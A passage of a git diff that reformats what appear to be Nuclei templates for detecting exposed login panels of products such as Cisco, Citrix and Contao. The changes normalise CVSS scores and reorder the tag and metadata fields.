Authentication Failure" tags: panel,clearcom,ccm diff --git a/http/exposed-panels/centreon-panel.yaml b/http/exposed-panels/centreon-panel.yaml index c272c1400d..0bd467ead1 100644 --- a/http/exposed-panels/centreon-panel.yaml +++ b/http/exposed-panels/centreon-panel.yaml @@ -7,7 +7,7 @@ info: description: Centreon login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/cerebro-panel.yaml b/http/exposed-panels/cerebro-panel.yaml index 8c95c99ba6..f08b88a038 100644 --- a/http/exposed-panels/cerebro-panel.yaml +++ b/http/exposed-panels/cerebro-panel.yaml @@ -9,11 +9,11 @@ info: - https://github.com/lmenezes/cerebro classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,cerebro metadata: max-request: 1 + tags: panel,cerebro http: - method: GET diff --git a/http/exposed-panels/checkmk/checkmarx-panel.yaml b/http/exposed-panels/checkmk/checkmarx-panel.yaml index 56ce7deafb..e6332b9bd5 100644 --- a/http/exposed-panels/checkmk/checkmarx-panel.yaml +++ b/http/exposed-panels/checkmk/checkmarx-panel.yaml @@ -7,11 +7,11 @@ info: description: Checkmarx WebClient login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,checkmarx metadata: max-request: 1 + tags: panel,checkmarx http: - method: GET diff --git a/http/exposed-panels/checkmk/checkmk-login.yaml b/http/exposed-panels/checkmk/checkmk-login.yaml index 2434c625be..476c2ff5a5 100644 --- a/http/exposed-panels/checkmk/checkmk-login.yaml +++ b/http/exposed-panels/checkmk/checkmk-login.yaml @@ -7,11 +7,11 @@ info: description: Checkmk login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: login,tech,synology,rackstation,panel metadata: max-request: 1 + tags: login,tech,synology,rackstation,panel http: - method: GET diff --git a/http/exposed-panels/checkpoint-panel.yaml b/http/exposed-panels/checkpoint-panel.yaml index 89c2f00e31..1ae6e98598 100644 --- a/http/exposed-panels/checkpoint-panel.yaml +++ b/http/exposed-panels/checkpoint-panel.yaml @@ -7,29 +7,32 @@ info: description: Checkpoint login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,checkpoint metadata: max-request: 2 + tags: panel,checkpoint http: - method: GET path: - "{{BaseURL}}/sslvpn/Login/Login" - "{{BaseURL}}/Login/Login" + matchers-condition: and host-redirects: true matchers: - type: status status: - 200 + - type: word part: body words: - "Check Point Software Technologies Ltd. All rights reserved." - "/Login/images/CompanyLogo.png" condition: and + - type: word part: header words: diff --git a/http/exposed-panels/checkpoint/ssl-network-extender.yaml b/http/exposed-panels/checkpoint/ssl-network-extender.yaml index 703c9f3a67..fe2a4f696a 100644 --- a/http/exposed-panels/checkpoint/ssl-network-extender.yaml +++ b/http/exposed-panels/checkpoint/ssl-network-extender.yaml @@ -10,7 +10,7 @@ info: - https://sc1.checkpoint.com/documents/R81/WebAdminGuides/EN/CP_R81_RemoteAccessVPN_AdminGuide/Topics-VPNRG/SSL-Network-Extender.htm?TocPath=SSL%20Network%20Extender%7C_____0 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/cisco/cisco-ace-device-manager.yaml b/http/exposed-panels/cisco/cisco-ace-device-manager.yaml index 9c014e4001..7737be98a4 100644 --- a/http/exposed-panels/cisco/cisco-ace-device-manager.yaml +++ b/http/exposed-panels/cisco/cisco-ace-device-manager.yaml @@ -7,7 +7,7 @@ info: description: Cisco ACE 4710 Device Manager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml b/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml index c6c5aae482..f3762fca6b 100644 --- a/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml +++ b/http/exposed-panels/cisco/cisco-anyconnect-vpn.yaml @@ -9,11 +9,11 @@ info: - https://github.com/Gilks/hostscan-bypass classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: cisco,panel,vpn metadata: max-request: 1 + tags: cisco,panel,vpn http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-asa-panel.yaml b/http/exposed-panels/cisco/cisco-asa-panel.yaml index df87dc8d81..dc63626582 100644 --- a/http/exposed-panels/cisco/cisco-asa-panel.yaml +++ b/http/exposed-panels/cisco/cisco-asa-panel.yaml @@ -7,11 +7,11 @@ info: description: Cisco ASA VPN panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: cisco,panel metadata: max-request: 1 + tags: cisco,panel http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-edge-340.yaml b/http/exposed-panels/cisco/cisco-edge-340.yaml index 006d1cb794..275ba654f4 100644 --- a/http/exposed-panels/cisco/cisco-edge-340.yaml +++ b/http/exposed-panels/cisco/cisco-edge-340.yaml @@ -7,7 +7,7 @@ info: description: Cisco Edge 340 panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/cisco/cisco-finesse-login.yaml b/http/exposed-panels/cisco/cisco-finesse-login.yaml index ef315b2aee..025114e1a5 100644 --- a/http/exposed-panels/cisco/cisco-finesse-login.yaml +++ b/http/exposed-panels/cisco/cisco-finesse-login.yaml @@ -5,15 +5,15 @@ info: author: dhiyaneshDK severity: info description: Cisco Finesse login panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.exploit-db.com/ghdb/6824 - tags: panel,cisco,edb + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: max-request: 1 + tags: panel,cisco,edb http: - method: GET @@ -25,6 +25,7 @@ http: - type: word words: - 'Sign in to Cisco Finesse' + - type: status status: - 200 diff --git a/http/exposed-panels/cisco/cisco-integrated-login.yaml b/http/exposed-panels/cisco/cisco-integrated-login.yaml index d955d7e700..72e23e7dfb 100644 --- a/http/exposed-panels/cisco/cisco-integrated-login.yaml +++ b/http/exposed-panels/cisco/cisco-integrated-login.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/3859 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,cisco,edb metadata: max-request: 1 + tags: panel,cisco,edb http: - method: GET @@ -25,6 +25,7 @@ http: - type: word words: - 'Cisco Integrated Management Controller Login' + - type: status status: - 200 diff --git a/http/exposed-panels/cisco/cisco-meraki-exposure.yaml b/http/exposed-panels/cisco/cisco-meraki-exposure.yaml index 19c5b61c47..d58da66307 100644 --- a/http/exposed-panels/cisco/cisco-meraki-exposure.yaml +++ b/http/exposed-panels/cisco/cisco-meraki-exposure.yaml @@ -9,11 +9,11 @@ info: - https://www.exploit-db.com/ghdb/6708 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,cisco,meraki,disclosure,edb metadata: max-request: 1 + tags: panel,cisco,meraki,disclosure,edb http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-onprem-panel.yaml b/http/exposed-panels/cisco/cisco-onprem-panel.yaml index b431e8b5ea..33fb736ddb 100644 --- a/http/exposed-panels/cisco/cisco-onprem-panel.yaml +++ b/http/exposed-panels/cisco/cisco-onprem-panel.yaml @@ -10,10 +10,10 @@ info: - https://www.cisco.com/c/en/us/products/collateral/cloud-systems-management/smart-software-manager-satellite/datasheet-c78-734539.html - https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ssm-sql-X9MmjSYh metadata: - fofa-query: title="On-Prem License Workspace" + verified: true max-request: 2 shodan-query: title:"On-Prem License Workspace" - verified: true + fofa-query: title="On-Prem License Workspace" tags: cisco,manager,login,panel http: @@ -25,6 +25,7 @@ http: stop-at-first-match: true host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml b/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml index 6d2057449e..284cc9533e 100644 --- a/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml +++ b/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml @@ -8,7 +8,7 @@ info: A Cisco Prime Infrastructure login panel was discovered. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/cisco/cisco-sd-wan.yaml b/http/exposed-panels/cisco/cisco-sd-wan.yaml index c84b505327..63db8f7439 100644 --- a/http/exposed-panels/cisco/cisco-sd-wan.yaml +++ b/http/exposed-panels/cisco/cisco-sd-wan.yaml @@ -9,11 +9,11 @@ info: - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sdwan-bufovulns-B5NrSHbj classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,cisco metadata: max-request: 1 + tags: panel,cisco http: - method: GET @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: status status: - 200 diff --git a/http/exposed-panels/cisco/cisco-secure-cn.yaml b/http/exposed-panels/cisco/cisco-secure-cn.yaml index 3f79047e4d..28e5b0145d 100644 --- a/http/exposed-panels/cisco/cisco-secure-cn.yaml +++ b/http/exposed-panels/cisco/cisco-secure-cn.yaml @@ -7,7 +7,7 @@ info: description: Cisco Secure CN login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/cisco/cisco-secure-desktop.yaml b/http/exposed-panels/cisco/cisco-secure-desktop.yaml index c7b8f2eb6a..ea2e328374 100644 --- a/http/exposed-panels/cisco/cisco-secure-desktop.yaml +++ b/http/exposed-panels/cisco/cisco-secure-desktop.yaml @@ -7,11 +7,11 @@ info: description: Cisco Secure Desktop installation panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: cisco,panel metadata: max-request: 1 + tags: cisco,panel http: - method: GET diff --git a/http/exposed-panels/cisco/cisco-sendgrid.yaml b/http/exposed-panels/cisco/cisco-sendgrid.yaml index 5260d89078..17a7044284 100644 --- a/http/exposed-panels/cisco/cisco-sendgrid.yaml +++ b/http/exposed-panels/cisco/cisco-sendgrid.yaml @@ -7,7 +7,7 @@ info: description: Cisco ServiceGrid login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/cisco/cisco-systems-login.yaml b/http/exposed-panels/cisco/cisco-systems-login.yaml index 81f147a6aa..b4a8cb8fe0 100644 --- a/http/exposed-panels/cisco/cisco-systems-login.yaml +++ b/http/exposed-panels/cisco/cisco-systems-login.yaml @@ -7,7 +7,7 @@ info: description: Cisco Systems login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/cisco/cisco-telepresence.yaml b/http/exposed-panels/cisco/cisco-telepresence.yaml index 54571e5f4e..5142c9319e 100644 --- a/http/exposed-panels/cisco/cisco-telepresence.yaml +++ b/http/exposed-panels/cisco/cisco-telepresence.yaml @@ -7,11 +7,11 @@ info: description: Cisco TelePresence login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"Cisco Telepresence" tags: panel,cisco @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml b/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml index 2776181632..acf68881d4 100644 --- a/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml +++ b/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml @@ -9,7 +9,7 @@ info: - https://www.cisco.com/c/en/us/td/docs/unified_computing/ucs/ucs-manager/GUI-User-Guides/Admin-Management/3-1/b_Cisco_UCS_Admin_Mgmt_Guide_3_1/b_Cisco_UCSM_GUI_Admin_Mgmt_Guide_3_1_chapter_01111.html classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/cisco/cisco-vmanage-login.yaml b/http/exposed-panels/cisco/cisco-vmanage-login.yaml index a95a9e4eb7..321dffc64c 100644 --- a/http/exposed-panels/cisco/cisco-vmanage-login.yaml +++ b/http/exposed-panels/cisco/cisco-vmanage-login.yaml @@ -7,11 +7,11 @@ info: description: Cisco vManage login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Cisco vManage" tags: panel,cisco @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/cisco/cisco-webvpn-detect.yaml b/http/exposed-panels/cisco/cisco-webvpn-detect.yaml index ac69d9b4b2..937cb87b7f 100644 --- a/http/exposed-panels/cisco/cisco-webvpn-detect.yaml +++ b/http/exposed-panels/cisco/cisco-webvpn-detect.yaml @@ -9,11 +9,11 @@ info: - https://askanydifference.com/difference-between-cisco-clientless-ssl-vpn-and-anyconnect-with-table/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 fofa-query: fid="U1TP/SJklrT9VLIEpZkQNg==" google-query: intitle:"SSLVPN Service" tags: panel,cisco,vpn @@ -27,6 +27,7 @@ http: host-redirects: true max-redirects: 2 stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/citrix-adc-gateway-detect.yaml b/http/exposed-panels/citrix-adc-gateway-detect.yaml index 939daec57d..dab4aec23d 100644 --- a/http/exposed-panels/citrix-adc-gateway-detect.yaml +++ b/http/exposed-panels/citrix-adc-gateway-detect.yaml @@ -7,11 +7,11 @@ info: description: Citrix ADC Gateway login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,citrix metadata: max-request: 2 + tags: panel,citrix http: - method: GET diff --git a/http/exposed-panels/citrix-vpn-detect.yaml b/http/exposed-panels/citrix-vpn-detect.yaml index 00e5b2cad4..11cd8deec4 100644 --- a/http/exposed-panels/citrix-vpn-detect.yaml +++ b/http/exposed-panels/citrix-vpn-detect.yaml @@ -7,16 +7,17 @@ info: description: Citrix VPN panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,citrix metadata: max-request: 1 + tags: panel,citrix http: - method: GET path: - "{{BaseURL}}/vpn/index.html" + matchers: - type: word words: diff --git a/http/exposed-panels/claris-filemaker-webdirect.yaml b/http/exposed-panels/claris-filemaker-webdirect.yaml index b2e31d484f..38a8383f52 100644 --- a/http/exposed-panels/claris-filemaker-webdirect.yaml +++ b/http/exposed-panels/claris-filemaker-webdirect.yaml @@ -5,15 +5,15 @@ info: author: DhiyaneshDK severity: info description: Claris FileMaker WebDirect panel was detected. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cwe-id: CWE-200 reference: - https://www.exploit-db.com/ghdb/5669 + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0 + cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: title:"Claris FileMaker WebDirect" tags: panel,edb diff --git a/http/exposed-panels/clave-login-panel.yaml b/http/exposed-panels/clave-login-panel.yaml index 63a906208e..5569a0bf22 100644 --- a/http/exposed-panels/clave-login-panel.yaml +++ b/http/exposed-panels/clave-login-panel.yaml @@ -7,11 +7,11 @@ info: description: Clave login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,clave,login metadata: max-request: 1 + tags: panel,clave,login http: - method: GET @@ -19,6 +19,7 @@ http: - '{{BaseURL}}/admin.php' host-redirects: true + matchers-condition: and matchers: - type: status diff --git a/http/exposed-panels/clearpass-policy-manager.yaml b/http/exposed-panels/clearpass-policy-manager.yaml index 4575950a47..760046027b 100644 --- a/http/exposed-panels/clearpass-policy-manager.yaml +++ b/http/exposed-panels/clearpass-policy-manager.yaml @@ -7,7 +7,7 @@ info: description: ClearPass Policy Manager login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/cloudpanel-login.yaml b/http/exposed-panels/cloudpanel-login.yaml index 4c2373379f..5b4ff4a6a8 100644 --- a/http/exposed-panels/cloudpanel-login.yaml +++ b/http/exposed-panels/cloudpanel-login.yaml @@ -5,8 +5,8 @@ info: author: DhiyaneshDk severity: info metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.favicon.hash:151132309 fofa-query: icon_hash="151132309" tags: panel,login,cloudpanel,detect diff --git a/http/exposed-panels/cloudphysician-radar.yaml b/http/exposed-panels/cloudphysician-radar.yaml index 3917759add..34371afd60 100644 --- a/http/exposed-panels/cloudphysician-radar.yaml +++ b/http/exposed-panels/cloudphysician-radar.yaml @@ -9,7 +9,7 @@ info: - https://www.exploit-db.com/ghdb/7466 classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -26,6 +26,7 @@ http: - type: word words: - 'Cloudphysician RADAR' + - type: status status: - 200 diff --git a/http/exposed-panels/cobbler-webgui.yaml b/http/exposed-panels/cobbler-webgui.yaml index 26f9ee3c6c..ff3f295e61 100644 --- a/http/exposed-panels/cobbler-webgui.yaml +++ b/http/exposed-panels/cobbler-webgui.yaml @@ -7,7 +7,7 @@ info: description: Cobbler WebGUI login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 @@ -21,6 +21,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: status diff --git a/http/exposed-panels/code-server-login.yaml b/http/exposed-panels/code-server-login.yaml index 815b03844b..b5c1f0fa1e 100644 --- a/http/exposed-panels/code-server-login.yaml +++ b/http/exposed-panels/code-server-login.yaml @@ -7,11 +7,11 @@ info: description: Code-Server login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"code-server login" tags: panel,detect,misc @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/code42-panel.yaml b/http/exposed-panels/code42-panel.yaml index d98bb5f73c..6897a508ae 100644 --- a/http/exposed-panels/code42-panel.yaml +++ b/http/exposed-panels/code42-panel.yaml @@ -7,11 +7,11 @@ info: description: Code42 panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel,code42 metadata: max-request: 1 + tags: panel,code42 http: - method: GET diff --git a/http/exposed-panels/codemeter-webadmin-panel.yaml b/http/exposed-panels/codemeter-webadmin-panel.yaml index 1faa1a0398..85e39f67e1 100644 --- a/http/exposed-panels/codemeter-webadmin-panel.yaml +++ b/http/exposed-panels/codemeter-webadmin-panel.yaml @@ -7,11 +7,11 @@ info: description: CodeMeter WebAdmin panel was accessed. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-668 - tags: codemeter,webadmin,panel metadata: max-request: 1 + tags: codemeter,webadmin,panel http: - method: GET diff --git a/http/exposed-panels/cofense-vision-panel.yaml b/http/exposed-panels/cofense-vision-panel.yaml index 78c1c19a35..5962718339 100644 --- a/http/exposed-panels/cofense-vision-panel.yaml +++ b/http/exposed-panels/cofense-vision-panel.yaml @@ -9,7 +9,7 @@ info: - https://cofense.com classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/coldfusion-administrator-login.yaml b/http/exposed-panels/coldfusion-administrator-login.yaml index 47f62f6976..bdcdfa44c3 100644 --- a/http/exposed-panels/coldfusion-administrator-login.yaml +++ b/http/exposed-panels/coldfusion-administrator-login.yaml @@ -7,7 +7,7 @@ info: description: ColdFusion Administrator login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/compal-panel.yaml b/http/exposed-panels/compal-panel.yaml index 79ef6431aa..8228c779cb 100644 --- a/http/exposed-panels/compal-panel.yaml +++ b/http/exposed-panels/compal-panel.yaml @@ -7,16 +7,17 @@ info: description: Compal CH7465LG login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: panel metadata: max-request: 1 + tags: panel http: - method: GET path: - "{{BaseURL}}/common_page/login.html" + matchers: - type: word words: diff --git a/http/exposed-panels/completeview-web-panel.yaml b/http/exposed-panels/completeview-web-panel.yaml index 57c925481d..ff74786d67 100644 --- a/http/exposed-panels/completeview-web-panel.yaml +++ b/http/exposed-panels/completeview-web-panel.yaml @@ -7,11 +7,11 @@ info: description: CompleteView panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.title:"CompleteView Web Client" tags: panel,completeview diff --git a/http/exposed-panels/concourse-ci-panel.yaml b/http/exposed-panels/concourse-ci-panel.yaml index 1e4846b743..86fa3aef3d 100644 --- a/http/exposed-panels/concourse-ci-panel.yaml +++ b/http/exposed-panels/concourse-ci-panel.yaml @@ -10,7 +10,7 @@ info: - https://concourse-ci.org classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/concrete5/concrete5-install.yaml b/http/exposed-panels/concrete5/concrete5-install.yaml index b28357e283..d204ced45c 100644 --- a/http/exposed-panels/concrete5/concrete5-install.yaml +++ b/http/exposed-panels/concrete5/concrete5-install.yaml @@ -8,8 +8,8 @@ info: reference: - https://documentation.concretecms.org/developers/introduction/installing-concrete-cms metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"Install concrete5" tags: panel,install,concrete,cms @@ -20,6 +20,7 @@ http: - "{{BaseURL}}/concrete5/index.php/install" stop-at-first-match: true + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/concrete5/concrete5-panel.yaml b/http/exposed-panels/concrete5/concrete5-panel.yaml index 566a27cdf1..a8526a55c2 100644 --- a/http/exposed-panels/concrete5/concrete5-panel.yaml +++ b/http/exposed-panels/concrete5/concrete5-panel.yaml @@ -7,7 +7,7 @@ info: description: Concrete5 login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: max-request: 1 diff --git a/http/exposed-panels/connect-box-login.yaml b/http/exposed-panels/connect-box-login.yaml index b89c22c409..0e6ddd79e3 100644 --- a/http/exposed-panels/connect-box-login.yaml +++ b/http/exposed-panels/connect-box-login.yaml @@ -7,11 +7,11 @@ info: description: Connect Box login panel was detected. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: 'NET-DK/1.0' tags: panel,connectbox,iot @@ -22,6 +22,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word diff --git a/http/exposed-panels/contao-login-panel.yaml b/http/exposed-panels/contao-login-panel.yaml index e90f8a7ada..93a8824d84 100644 --- a/http/exposed-panels/contao-login-panel.yaml +++ b/http/exposed-panels/contao-login-panel.yaml @@ -7,11 +7,11 @@ info: description: Contao login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 1 verified: true + max-request: 1 shodan-query: http.html:"Contao Open Source CMS" tags: panel,contao @@ -22,7 +22,6 @@ http: matchers-condition: and matchers: - - type: word part: body words: diff --git a/http/exposed-panels/content-central-login.yaml b/http/exposed-panels/content-central-login.yaml index 771a745cb3..be244c4415 100644 --- a/http/exposed-panels/content-central-login.yaml +++ b/http/exposed-panels/content-central-login.yaml @@ -7,11 +7,11 @@ info: description: Content Central login panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 metadata: - max-request: 2 verified: true + max-request: 2 shodan-query: http.title:"Content Central Login" tags: panel,content-central diff --git a/http/exposed-panels/contentkeeper-detect.yaml b/http/exposed-panels/contentkeeper-detect.yaml index 7abd5da49a..ccd4c76609 100644 --- a/http/exposed-panels/contentkeeper-detect.yaml +++ b/http/exposed-panels/contentkeeper-detect.yaml @@ -9,11 +9,11 @@ info: - https://www.contentkeeper.com/ classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + cvss-score: 0 cwe-id: CWE-200 - tags: contentkeeper,panel metadata: max-request: 1 + tags: contentkeeper,panel http: - method: GET diff --git a/http/exposed-panels/corebos-panel.yaml b/http/exposed-panels/corebos-panel.yaml index 1b7b3fa97b..a348f82496 100644 --- a/http/exposed-panels/corebos-panel.yaml +++ b/http/exposed-panels/corebos-panel.yaml @@ -7,11 +7,11 @@ info: description: coreBOS panel was detected. classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 + 